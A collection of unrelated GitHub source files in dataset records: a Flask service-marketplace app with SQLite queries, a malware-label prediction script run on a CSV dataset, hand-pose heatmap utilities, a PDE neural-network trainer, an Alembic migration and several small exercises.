Add it to the database.\r\n if not User.get(unique_id):\r\n User.create(unique_id, users_name, users_email, picture)\r\n\r\n # Begin user session by logging the user in\r\n login_user(user)\r\n\r\n # Send user back to homepage\r\n return redirect(url_for(\"homepage\"))\r\n\r\n@app.route(\"/logout\")\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for(\"homepage\"))\r\n\r\n@app.route(\"/profile\")\r\n@login_required\r\ndef profile():\r\n services_info = get_categories()\r\n user_services = get_user_services()\r\n checked_services = make_checked_services_list(user_services, services_info[0])\r\n return render_template(\"profile.html\", google_user=current_user, services=services_info[0], services_id=services_info[1], user_info=get_user_info(), checked_services=checked_services)\r\n\r\ndef make_checked_services_list(user_services, all_services):\r\n checked = {}\r\n for service in all_services:\r\n if service in user_services:\r\n checked[service] = \"Checked\"\r\n else:\r\n checked[service] = \"\"\r\n return checked\r\n\r\ndef get_user_services():\r\n conn = sqlite3.connect(\"database/UberNeeds.db\")\r\n statement = '''\r\n select Name from UsersCategories\r\n join Categories on UsersCategories.Categorie_id = Categories.id\r\n where User_id = ?\r\n '''\r\n cursor = conn.execute(statement, [current_user.id])\r\n data = []\r\n\r\n for row in cursor:\r\n data.append(row[0])\r\n\r\n conn.close()\r\n return data\r\n\r\ndef get_user_info():\r\n conn = sqlite3.connect(\"database/UberNeeds.db\")\r\n\r\n data = get_user_by_id(current_user.id, conn)\r\n\r\n if len(data) == 0:\r\n conn.execute(\"insert into Users (id) values (?)\", [current_user.id])\r\n conn.commit()\r\n\r\n data = get_user_by_id(current_user.id, conn)\r\n\r\n conn.close()\r\n return data[0]\r\n\r\ndef get_user_by_id(user_id, conn):\r\n cursor = conn.execute(\"select * from Users where id = ?\", [user_id])\r\n data = []\r\n\r\n for row in cursor:\r\n data.append((row[1], row[2], row[3]))\r\n \r\n return data\r\n\r\n@app.route(\"/save_user\", methods=['POST'])\r\ndef save_user():\r\n tel = request.form['tel']\r\n postalcode = request.form['postalcode']\r\n city = request.form['city']\r\n\r\n email = current_user.email\r\n user_id = User.get_userid_by_email(email)\r\n add_user_info(user_id, postalcode, city, tel)\r\n\r\n services = request.form.getlist('service')\r\n add_services_to_user(user_id, services)\r\n remove_services(services, user_id)\r\n return redirect(url_for(\"profile\"))\r\n\r\ndef remove_services(services_by_user, user_id):\r\n all_services = get_categories()\r\n statement = '''\r\n DELETE FROM UsersCategories\r\n WHERE User_id = ? 
and Categorie_id = ?\r\n '''\r\n\r\n for service in all_services[1]:\r\n if str(service) not in services_by_user:\r\n conn = sqlite3.connect(db_name)\r\n conn.execute(statement, [str(user_id), service])\r\n conn.commit()\r\n conn.close()\r\n\r\ndef add_services_to_user(user_id, services):\r\n conn = sqlite3.connect(db_name)\r\n\r\n statement_insert = 'insert into UsersCategories values (?, ?, ?)'\r\n for service in services:\r\n try:\r\n conn.execute(statement_insert, [user_id, service, -1])\r\n conn.commit()\r\n except sqlite3.IntegrityError:\r\n pass\r\n\r\n conn.close()\r\n\r\ndef add_user_info(user_id, postalcode, city, tel):\r\n conn = sqlite3.connect(db_name)\r\n statement_insert = 'insert into Users values (?, ?, ?, ?)'\r\n statement_update = '''\r\n update Users set \r\n PostalCode = ?,\r\n Location = ?,\r\n TelNumber = ?\r\n where Users.id = ?\r\n ''' \r\n\r\n try:\r\n conn.execute(statement_insert, [user_id, postalcode, city, tel])\r\n except sqlite3.IntegrityError:\r\n conn.execute(statement_update, [postalcode, city, tel, user_id])\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\ndef get_categories():\r\n conn = sqlite3.connect(db_name)\r\n cursor = conn.execute(\"select * from Categories\")\r\n services = []\r\n services_id = []\r\n\r\n for row in cursor:\r\n services.append(row[1])\r\n services_id.append(row[0])\r\n conn.close()\r\n\r\n return services, services_id\r\n\r\n@app.route(\"/categoriesfeed/\")\r\ndef categoriesfeed(category):\r\n category_id = get_id_of_category(category)\r\n conn = sqlite3.connect(db_name)\r\n statement = '''\r\n select Users.*, avgrating from Users\r\n join UsersCategories on Users.id = UsersCategories.User_id\r\n join Categories on UsersCategories.Categorie_id = Categories.id\r\n where Categories.Name = ?\r\n order by AvgRating desc\r\n '''\r\n cursor = conn.execute(statement, [category])\r\n data = {}\r\n\r\n for row in cursor:\r\n userid = row[0]\r\n\r\n data[userid] = []\r\n for element in row:\r\n data[userid].append(element)\r\n\r\n GoogleUser = User.get(userid)\r\n data[userid].extend([GoogleUser.name, GoogleUser.email, GoogleUser.profile_pic])\r\n conn.close()\r\n return render_template(\"categoriesfeed.html\", google_user=current_user, text=category, data=data)\r\n\r\ndef get_id_of_category(category):\r\n conn = sqlite3.connect(db_name)\r\n cursor = conn.execute(\"select id from Categories where Name = ?\", [category])\r\n category_id = \"\"\r\n\r\n for row in cursor:\r\n category_id = row[0]\r\n conn.close()\r\n\r\n return category_id\r\n\r\n@app.route(\"/about_us\")\r\ndef aboutus():\r\n\treturn render_template(\"about_us.html\", google_user=current_user)\r\n\r\n@app.route(\"/categories\")\r\ndef categories():\r\n\treturn render_template(\"categories.html\", categories=getcategories(), google_user=current_user)\r\n\r\n@app.route(\"/addcategorie\")\r\ndef addcategorie():\r\n\treturn render_template(\"addcategorie.html\", google_user=current_user)\r\n\r\ndef getcategories():\r\n\tconn = sqlite3.connect(\"database/UberNeeds.db\")\r\n\tcursor = conn.execute(\"select * from Categories\")\r\n\tdata = []\r\n\r\n\tfor row in cursor:\r\n\t\tdata.append({\"name\":row[1],\r\n\t\t\t\t\t\"description\": row[2]})\r\n\tconn.close()\r\n\r\n\treturn data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # here is starting of the development HTTP server\r\n # app.run(ssl_context=(\"cert.pem\", \"key.pem\"), host='0.0.0.0', port=8008)\r\n app.run(ssl_context=\"adhoc\", host='0.0.0.0', 
port=8008)","repo_name":"vives-projectweek-1-2020/Uber-Needs","sub_path":"flaskapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71133822889","text":"import json\nimport sys\nfrom malware_ml.database import DBLog\nfrom malware_ml.prepare_data import DEFAULT_TARGET, DEFAULT_ID\nfrom malware_ml.model import apply_model, load_model\nimport pandas as pd\n\nDEFAULT_MODEL_PATH = './models/lgbm.pkl'\nDEFAULT_DB_PATH = './database/log.db'\n\n\nif __name__ == '__main__':\n args = sys.argv\n if len(args) == 1:\n model_path = DEFAULT_MODEL_PATH\n else:\n model_path = sys.argv[-1]\n model = load_model(model_path)\n print('Send json string to get prediction.')\n print('Send \\'stop\\' string to finish.')\n db_log = DBLog(DEFAULT_DB_PATH)\n db_log.drop_table()\n n = 0\n # while True:\n d = pd.read_csv('../ML/data/train.csv', chunksize=1, nrows=1000)\n for i in d:\n input_string = i.to_json()\n if input_string == 'stop':\n break\n data = json.loads(input_string)\n # If we take an example from the dataset, it will contain a string index\n target = data.get(DEFAULT_TARGET)[str(n)]\n identifier = data.get(DEFAULT_ID)[str(n)]\n n += 1\n prediction = apply_model(model, data)\n db_log.insert(identifier, prediction, target)\n db_log.close()\n","repo_name":"zverkovboris/Malware-Prediction","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30578689259","text":"import numpy as np\nimport torch\nimport cv2\n\nRAW_IMG_SIZE=228\nMODEL_INPUT_SIZE=128\nMODEL_OUTPUT_SIZE=64\nHEATMAP_SIGMA=1\nN_JOINTS=21\nlambda_hm=1\n\ndef projectPoints(xyz, K):\n \"\"\"\n Projects 3D coordinates into image space.\n Function taken from https://github.com/lmb-freiburg/freihand\n \"\"\"\n xyz = np.array(xyz)\n K = np.array(K)\n uv = np.matmul(K, xyz.T).T\n return uv[:, :2] / uv[:, -1:]\n\ndef gen_heatmap(img, pt, sigma):\n\t\"\"\"\n\tfrom Minimal-Hand model\n\n generate heatmap based on pt coord\n\n :param img: original heatmap, zeros\n :type img: np (H,W) float32\n :param pt: keypoint coord\n :type pt: np (2,) int32\n :param sigma: gaussian sigma\n :type sigma: float\n :return\n - generated heatmap, np (H, W) where each pixel value is a probability\n - flag 0 or 1: indicates whether this heatmap is valid (1)\n\n \"\"\"\n\t#pt = pt.astype(np.int32)\n\n # Check that any part of the gaussian is in-bounds\n\n\tvector = np.vectorize(np.int32)\n\tul = [(pt[0] - 3 * sigma), (pt[1] - 3 * sigma)]\n\tul = vector(ul)\n\tbr = [(pt[0] + 3 * sigma + 1), (pt[1] + 3 * sigma + 1)]\n\tbr = vector(br)\n\t\"\"\"\n\tif (\n\t ul[0] >= img.shape[1]\n\t or ul[1] >= img.shape[0]\n\t or br[0] < 0\n\t or br[1] < 0 ):\n\t # If not, just return the image as is\n\t print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\t return img, 0\n\t\"\"\"\n\n\t# Generate gaussian\n\tsize = 6 * sigma + 1\n\tx = np.arange(0, size, 1, float)\n\ty = x[:, np.newaxis]\n\tx0 = y0 = size // 2\n\tg = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))\n\t# Usable gaussian range\n\tg_x = max(0, -ul[0]), min(br[0], img.shape[1]) - ul[0]\n\tg_y = max(0, -ul[1]), min(br[1], img.shape[0]) - ul[1]\n\t# Image range\n\timg_x = max(0, ul[0]), min(br[0], img.shape[1])\n\timg_y = max(0, ul[1]), min(br[1], img.shape[0])\n\n\timg[img_y[0]:img_y[1], img_x[0]:img_x[1]] = g[g_y[0]:g_y[1], 
g_x[0]:g_x[1]]\n\treturn img, 1\n\ndef vector_to_heatmaps(keypoints):\n \"\"\"\n Creates 2D heatmaps from keypoint locations for a single image\n Input: array of size N_JOINTS x 2\n Output: array of size N_JOINTS x MODEL_IMG_SIZE x MODEL_IMG_SIZE\n \"\"\"\n heatmaps = np.zeros([N_JOINTS, MODEL_OUTPUT_SIZE, MODEL_OUTPUT_SIZE])\n for k, (x, y) in enumerate(keypoints):\n x, y = int(x * MODEL_OUTPUT_SIZE), int(y * MODEL_OUTPUT_SIZE)\n if (0 <= x < MODEL_OUTPUT_SIZE) and (0 <= y < MODEL_OUTPUT_SIZE):\n heatmaps[k, int(y), int(x)] = 1\n\n heatmaps = blur_heatmaps(heatmaps)\n return heatmaps\n\n\ndef blur_heatmaps(heatmaps):\n \"\"\"Blurs heatmaps using GaussianBlur of defined size\"\"\"\n heatmaps_blurred = heatmaps.copy()\n for k in range(len(heatmaps)):\n if heatmaps_blurred[k].max() == 1:\n heatmaps_blurred[k] = cv2.GaussianBlur(heatmaps[k], (51, 51), 3)\n heatmaps_blurred[k] = heatmaps_blurred[k] / heatmaps_blurred[k].max()\n return heatmaps_blurred","repo_name":"htuannn/Monocular-Real-time-2D-Hand-Pose-Estimation","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26203802425","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nbase_test = \"test loss excel path\"\nbase_training = \"training loss excel path\"\n\ndef no_decoder_fun(file_path, runtime, error_type):\n reference = pd.read_excel(file_path)\n reference = reference[reference.runtime == runtime]\n reference.reset_index(drop=True, inplace=True)\n reference.index +=1\n for i in range(2,11):\n reference.at[i, error_type] = reference.iloc[0][error_type]\n\n reference[error_type].plot(label= \"No Decoder\")\n plt.legend()\n\ndef training_fun(error_type):\n \"\"\"error_type is in the format \"DTE\", that is, it is a string. Possible values are: DTE, DL, LDL, CL, LCL.\"\"\"\n plt.figure()\n for lr in [\"2e-4\", \"2e-5\", \"5e-4\", \"8e-5\"]:\n\n df2 = pd.read_excel(base_training+\"/\"+lr+'.xlsx')\n df2.dropna(inplace=True)\n df2 = df2[df2.runtime == 190]\n df2.reset_index(drop=True, inplace=True)\n df2.index +=1\n df2[error_type].plot(title= \"Training Accuracy\", label= lr)\n plt.ylabel(\"Accuracy under \"+error_type+\" (%)\")\n plt.xlabel(\"Epoch\")\n plt.xlim(1,10)\n plt.legend()\n no_decoder_fun(base_training+\"/no_decoder.xlsx\", 190, error_type)\n plt.grid()\n plt.show()\n\ndef test_fun(error_type):\n \"\"\"error_type is in the format \"DTE\", that is, it is a string. 
Possible values are: DTE, DL, LDL, CL, LCL.\"\"\"\n plt.figure()\n\n for lr in [\"2e-4\", \"2e-5\", \"5e-4\", \"8e-5\"]:\n df1= pd.read_excel(base_test+\"/\"+lr+'.xlsx')\n df1.dropna(inplace=True)\n df1 = df1[df1.runtime == 57]\n df1.reset_index(drop=True, inplace=True)\n df1.index +=1\n df1[error_type].plot(title= \"Test Accuracy\", label= lr)\n plt.ylabel(\"Accuracy under \"+error_type+\" (%)\")\n plt.xlabel(\"Epoch\")\n plt.xlim(1,10)\n plt.legend()\n\n no_decoder_fun(base_test+\"/no_decoder.xlsx\", 57, error_type)\n plt.grid()\n plt.show()\n\nfor i in [\"DTE\", \"DL\", \"LDL\", \"CL\", \"LCL\"]:\n training_fun(i)\n test_fun(i)","repo_name":"gusauriemo/Final-Year-Project","sub_path":"analysis of results.py","file_name":"analysis of results.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72379734887","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 18 15:17:47 2020\n\n@author: Vicky\n\n\nNeural PDE - Tensorflow 2.X\nModule : Model\n\nTraining Ground Class which houses all the associated training functions - loss functions, gradient functions, callbacks, training loops and evaluation functions \n\"\"\"\nimport time\nimport numpy as np\nimport tensorflow as tf\n\nfrom .network import Network\nfrom .pde import PDE\nfrom . import boundary_conditions\nfrom .sampler import Sampler\nfrom . import options \nfrom . import qnw\n\nclass TrainingGround(Network, Sampler, PDE):\n \n def __init__(self, layers, lb, ub, activation, initializer, BC, BC_Vals, N_f, network_type, pde_func, eqn_str, in_vars, out_vars, sampler):\n \"\"\"\n \n\n Parameters\n ----------\n layers : LIST\n Number of neurons in each layer\n lb : ARRAY\n Lower Range of the time and space domain\n ub : ARRAY\n Upper Range of the time and space domain\n activation : STR\n Name of the activation Function\n initializer : STR\n Name of the Initialiser for the neural network weights\n N_f : INT\n Number of points sampled from the domain space.\n pde_func : FUNC\n Explicitly defined domain function.\n eqn_str : STR\n The PDE in string with the specified format.\n in_vars : INT\n Number of input variables.\n out_vars : INT\n Number of output variables.\n\n Returns\n -------\n None.\n\n \"\"\"\n \n Network.__init__(self, layers, lb, ub, activation, initializer)\n Sampler.__init__(self, N_f, subspace_N = int(N_f/10)) #Percentage to be sampled from the subspace. \n PDE.__init__(self, eqn_str, in_vars, out_vars)\n \n self.layers = layers \n self.input_size = self.layers[0]\n self.output_size = self.layers[-1]\n \n self.bc = boundary_conditions.select(BC)\n \n if network_type == 'Regular':\n self.model = Network.initialize_NN(self)\n elif network_type == 'Resnet':\n self.model = Network.initialize_resnet(self, num_blocks=2)\n else:\n raise ValueError(\"Unknown Network Type. 
It should be either 'Regular' or 'Resnet'\")\n\n self.trainable_params = self.model.trainable_weights\n\n \n self.pde = PDE.func #Implicit \n # self.pde = pde_func #Explicit\n \n self.loss_list =[]\n self.sampler = sampler\n \n #Explicit\n # def pde_func(self, X):\n # pde_loss = self.pde(self.model, X)\n # return pde_loss\n\n\n \n def ic_func(self, X, u):\n u_pred = self.model(X, training=True)\n ic_loss = u_pred - u\n return ic_loss\n\n \n def bc_func(self, X, u):\n bc_loss = self.bc(self.model, X, u)\n return bc_loss\n \n #Implicit\n def pde_func(self, X):\n pde_loss = self.pde(self, X)\n return pde_loss\n \n \n \n def loss_func(self, X_i, u_i, X_b, u_b, X_f):\n \n initial_loss = self.ic_func(X_i, u_i)\n boundary_loss = self.bc_func(X_b, u_b)\n domain_loss = self.pde_func(X_f)\n \n return tf.reduce_mean(tf.square(initial_loss)) + \\\n tf.reduce_mean(tf.square(boundary_loss)) + \\\n tf.reduce_mean(tf.square(domain_loss))\n \n @tf.function\n @tf.autograph.experimental.do_not_convert\n def loss_and_gradients(self, X_i, u_i, X_b, u_b, X_f):\n \"\"\"\n \n\n Parameters\n ----------\n X_i : NUMPY ARRAY\n Initial input points.\n u_i : NUMPY ARRAY\n Initial outputs.\n X_b : NUMPY ARRAY\n Boundary input points.\n u_b : NUMPY ARRAY\n Boundary outputs.\n X_f : NUMPY ARRAY\n Domain input points.\n\n Returns\n -------\n model_loss : TENSOR\n Sum of Initial, Boundary and Domain MSE loss\n model_gradients : TENSOR\n Loss gradient with respect to the model trainable params. \n\n \"\"\"\n with tf.GradientTape() as tape:\n model_loss=self.loss_func(X_i, u_i, X_b, u_b, X_f)\n model_gradients = tape.gradient(model_loss, self.trainable_params)\n return model_loss, model_gradients\n \n def callback_GD(self, it, loss_value):\n elapsed = time.time() - self.init_time\n self.loss_list.append(loss_value)\n print('GD. 
It: %d, Loss: %.3e, Time: %.2f' % \n (it, loss_value, elapsed))\n self.init_time = time.time()\n \n \n \n def train(self, train_config, train_data):\n start_time = time.time()\n \n optimizer, kind = options.get_optimizer(name=train_config['Optimizer'], lr=train_config['learning_rate'])\n nIter = train_config['Iterations']\n \n \n X_i = train_data['X_i']\n u_i = train_data['u_i']\n X_b = train_data['X_b']\n u_b = train_data['u_b']\n X_f = train_data['X_f']\n \n \n self.init_time = time.time()\n \n if kind == \"GD\":\n if self.sampler == 'Initial':\n nIter_2 = nIter\n else :\n nIter_2 = int(nIter/2)\n \n for it in range(nIter):\n \n model_loss, model_gradients = self.loss_and_gradients(X_i, u_i, X_b, u_b, X_f)\n optimizer.apply_gradients(zip(model_gradients, self.trainable_params))\n \n if it%10 == 0:\n self.callback_GD(it, model_loss)\n \n # if self.sampler == 'Residual': \n # X_f_sampled = Sampler.str_sampler(self)\n # # X_f_sampled = tf.concat([X_f, X_f_sampled], axis=0)\n # X_f_sampled = np.vstack((X_f, X_f_sampled))\n \n # for it in range(nIter_2, nIter):\n \n # if it %500 ==0:\n # X_f_sampled = Sampler.str_sampler(self)\n # # X_f_sampled = tf.concat([X_f, X_f_sampled], axis=0)\n # X_f_sampled = np.vstack((X_f, X_f_sampled))\n \n # model_loss, model_gradients = self.loss_and_gradients(X_i, u_i, X_b, u_b, X_f_sampled)\n # optimizer.apply_gradients(zip(model_gradients, self.trainable_params))\n \n # if it%10 == 0:\n # self.callback_GD(it, model_loss)\n \n # elif self.sampler == 'Uniform':\n # X_f_sampled = Sampler.uniform_sampler(self)\n \n # for it in range(nIter_2, nIter):\n \n # if it %500 ==0:\n # X_f_sampled = Sampler.uniform_sampler(self)\n \n # model_loss, model_gradients = self.loss_and_gradients(X_i, u_i, X_b, u_b, X_f_sampled)\n # optimizer.apply_gradients(zip(model_gradients, self.trainable_params))\n \n # if it%10 == 0:\n # self.callback_GD(it, model_loss)\n \n elif kind == \"QN_Scipy\":\n \n func = qnw.Scipy_Keras_Wrapper(self.model, self.loss_func, X_i, u_i, X_b, u_b, X_f)\n # convert initial model parameters to a 1D tf.Tensor\n init_params = tf.dynamic_stitch(func.idx, self.model.trainable_variables)\n \n trained_variables = optimizer(fun=func,\n x0=init_params,\n jac=True,\n method = train_config['Optimizer'])\n \n func.assign_new_model_parameters(trained_variables.x)\n\n\n elif kind == \"QN_TFP\":\n \n func = qnw.TFP_Keras_Wrapper(self.model, self.loss_func, X_i, u_i, X_b, u_b, X_f)\n # convert initial model parameters to a 1D tf.Tensor\n init_params = tf.dynamic_stitch(func.idx, self.model.trainable_variables)\n \n trained_variables = optimizer(value_and_gradients_function=func,\n initial_position=init_params,\n max_iterations=500)\n \n func.assign_new_model_parameters(trained_variables.position)\n \n end_time = time.time() - start_time \n return end_time\n \n \n def predict(self, X):\n return self.model(X).numpy()\n \n \n def retrain(self, model, train_config, train_data):\n self.model = model\n self.trainable_params = self.model.trainable_variables\n \n return self.train(train_config, train_data)","repo_name":"gitvicky/tf-pde","sub_path":"tfpde/training_ground.py","file_name":"training_ground.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24580072692","text":"# quokkaCMD.py\n# A program that peeks into files and folders (a file explorer)\n\nimport os\n\n# Absolute path of the current script file \ncurrent_directory_path = os.path.dirname(os.path.abspath(__file__))\nprint(f\"script executing path : 
{current_directory_path}\")\n\n# 작업 디렉터리를 현재 스크립트 파일이 있는 디렉터리로 변경 \nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\nos.system(\"dir\") # dir : 파일 리스트 출력 시스템 명령어\nos.system(\"pause\") # pause : 사용자가 키를 누를 때까지 일시 중지 \n","repo_name":"circleolami/grape_quokka-the-rat","sub_path":"legacy/quokkaCMD.py","file_name":"quokkaCMD.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33298750118","text":"\"\"\"\r\nVery simple toy demonstrating \r\na very simple case of bias/variance trade-off.\r\n\r\nCheck for companion file index.html nearby.\r\n\r\nBrowser complains about coding line, removed:\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nabout_str = \"\"\"Using Brython to construct a very simple toy \r\ndemonstrating a very simple case of \r\nbias/variance trade-off.\r\n\r\nAesthetics to be taken care of some day.\r\n\r\nJosé L Balcázar (balqui at BitBucket or GitHub)\r\n2018\"\"\"\r\n\r\nfrom browser import document, alert, html # Brython in-browser support\r\nfrom random import gauss\r\n\r\ndef about():\r\n\talert(about_str)\r\n\r\ndef start(event):\r\n\t\"get parameter values and reinitialize data\"\r\n\tmean = float(document[\"mean\"].value)\r\n\tstdev = float(document[\"stdev\"].value)\r\n\tssize = int(document[\"ssize\"].value)\r\n\tdecs = 6 # max of decimal places to test\r\n\r\n\tdocument['approxmean'].text = \"\"\r\n\tdocument['samplevalues'].text = \"\"\r\n\r\n\td = []\r\n\tfor i in range(ssize):\r\n\t\td.append(gauss(mean,stdev))\r\n\ts = sum(d)\r\n\r\n#\ts = 0\r\n#\tfor e in d:\r\n#\t\t#print e\r\n#\t\ts += e\r\n\r\n\tfor p in range(0,decs):\r\n\t\tform = \"%%1.%df\" % p\r\n\t\t#print form % (s/len(d))\r\n\t\tdocument['approxmean'] <= html.P(form % (s/len(d)))\r\n\r\n\tfor e in d:\r\n\t\tdocument['samplevalues'] <= html.P(str(e))\r\n\r\n# main program: \r\n# bind buttons to processes and leave everything for Brython to care for.\r\n\r\ndocument['aboutbutton'].bind('click', about)\r\n\r\ndocument['samplebutton'].bind('click', start)\r\n\r\n\r\n","repo_name":"balqui/BiasVarianceTradeOffDemo","sub_path":"BVT.py","file_name":"BVT.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6995505096","text":"# Curso intensivo de Python\n#\n# Exercício 8.7-Álbum: Escreva uma função chamada make_album() que construa um dicionário descrevendo um\n# álbum musical. A função deve aceitar o nome de um artista e o título de um álbum e deve devolver um\n# dicionário contendo essas duas informações. Use a função para criar três dicionários que representem\n# álbuns diferentes. Apresente cada valor devolvido para mostrar que os dicionários estão armazenando as\n# informações do álbum corretamente. Acrescente um parâmetro opcional em make_album() que permita armazenar\n# o número de faixas em um álbum. Se a linha que fizer a chamada incluir um valor para o número de faixas,\n# acrescente esse valor ao dicionário do álbum. 
Make at least one new call to the function including the\n# number of tracks in an album.\n\ndef make_album(nome, titulo, faixas=\"\"):\n \"\"\"Returns a dictionary with information about a music album\"\"\"\n album_musical = {\n \"nome\": nome,\n \"titulo\": titulo,\n }\n if faixas:\n album_musical[\"faixas\"] = faixas\n return album_musical\n\nalbum_1 = make_album(\"System of a Down\", \"Hipnotize\")\nprint(album_1)\n\nalbum_2 = make_album(\"System os a Down\", \"Steal this album!\")\nprint(album_2)\n\nalbum_3 = make_album(\"Foo Fighters\", \"Echoes, Silence, Patience & Grace\")\nprint(album_3)\n\nalbum_4 = make_album(\"Iron Maiden\", \"Fear of the Dark\", 12)\nprint(album_4)","repo_name":"AndersonShermann/Python","sub_path":"Cap8-Funcoes/exercicio8.7.py","file_name":"exercicio8.7.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5549869508","text":"# name = \"Ugain jain\"\n# salutation = \"Mr.\"\n# full_name = salutation + \" \"+ name\n# age = 21\n# rating = 3.8\n# status = \"Crazy me....\"\n\n# spy = {\"name\": \"Ugain\", \"Salutation\": \"Mr\", \"age\": 21, \"Rating\": 3.8, \"Status\": \"CRazy mee....\"}\nfrom datetime import datetime\n\n\nclass Spy:\n\n def __init__(self, name, salutation, age, rating):\n self.name = name\n self.salutation = salutation\n self.age = age\n self.rating = rating\n self.is_online = True\n self.chats = []\n self.current_status_message = None\n\n\nclass ChatMessage:\n def __init__(self, spy_name, friend_name, message, time, sent_by_me):\n self.spy_name = spy_name\n self.friend_name = friend_name\n self.message = message\n self.sent_by_me = sent_by_me\n self.time = time\n\n\n\nspy = Spy(\"Ugain\", \"Mr.\", 21, 4)","repo_name":"UgainJain/SpyChat","sub_path":"spy_details.py","file_name":"spy_details.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2262420504","text":"\"\"\"empty message\n\nRevision ID: 3d8ce78f7e4\nRevises: None\nCreate Date: 2015-03-07 18:28:19.469762\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3d8ce78f7e4'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), nullable=False),\n sa.Column('email', sa.String(length=255), nullable=False),\n sa.Column('encrypted_password', sa.String(length=60), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('task',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=255), nullable=False),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('status', sa.String(length=255), nullable=True),\n sa.Column('due_date', sa.String(length=40), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.Column('assigned_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['assigned_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['owner_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('task')\n op.drop_table('user')\n ### end Alembic commands ###\n","repo_name":"reserve-sienna/coaction","sub_path":"migrations/versions/3d8ce78f7e4_.py","file_name":"3d8ce78f7e4_.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28666179959","text":"import unittest\nimport lambdaLib\n\n\n\nclass TestStringMethods(unittest.TestCase):\n # def setUp(self):\n # self.txt = lambdaLib.getData()\n\n def test_get_data(self):\n txt = lambdaLib.getData()\n self.assertEqual(txt[0:6], '[info]')\n\n def test_time_ranges(self):\n text = \"21:51:02.668 [sca-execon-co aramers$-ihu}!2]*21:51:12.082 [scal21:51:24.950\"\n timeRanges = lambdaLib.findTimePeriod(text)\n self.assertEqual(timeRanges, ['21:51:02.668', '21:51:12.082', '21:51:24.950'])\n\n def test_datetime_convert(self):\n time = lambdaLib.datetime_convert(\"21:51:02\")\n self.assertEqual(time.hour, 21)\n self.assertEqual(time.minute, 51)\n self.assertEqual(time.second, 2)\n\n def test_datetime_c(self):\n t1 = lambdaLib.datetime_convert(\"19:51:22\")\n t2 = lambdaLib.datetime_convert(\"21:48:03\")\n self.assertTrue(lambdaLib.is_in_range(t1, t2))\n self.assertFalse(lambdaLib.is_in_range(t2, t1))\n\n def test_split(self):\n ta = [\"[info]\",\"[warn]\",\"21:51:01.824\",\"[success]\"]\n size = len(lambdaLib.remove_front_nonlog(ta))\n self.assertEqual(size, 2)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"Carpk/aws-lambda-grpc-sample","sub_path":"lambda/lambdaTest.py","file_name":"lambdaTest.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70038719848","text":"import datetime\n\nclass Animation(object):\n def __init__(self, smiley):\n \"\"\" Smiley is an array of frames, see smiley_happy\"\"\"\n self.smiley = smiley\n self.nof_frames = len(self.smiley)\n self.index = 0\n self.timeout = datetime.datetime.now()\n\n def grid_if_update_needed(self):\n now = datetime.datetime.now()\n if now > self.timeout:\n self.index = (self.index + 1) % self.nof_frames\n self.timeout = now + datetime.timedelta(seconds=self.smiley[self.index]['time'])\n return self.smiley[self.index]['smiley']\n return None","repo_name":"jackha/neopixels","sub_path":"python/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8621028946","text":"import sys\n\nsys.path.append(r\"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/\")\nfrom environment_loop import EnvironmentLoop\nfrom Agents.D4PG_new.agent import D4PG\nfrom Agents.D4PG_new.networks import 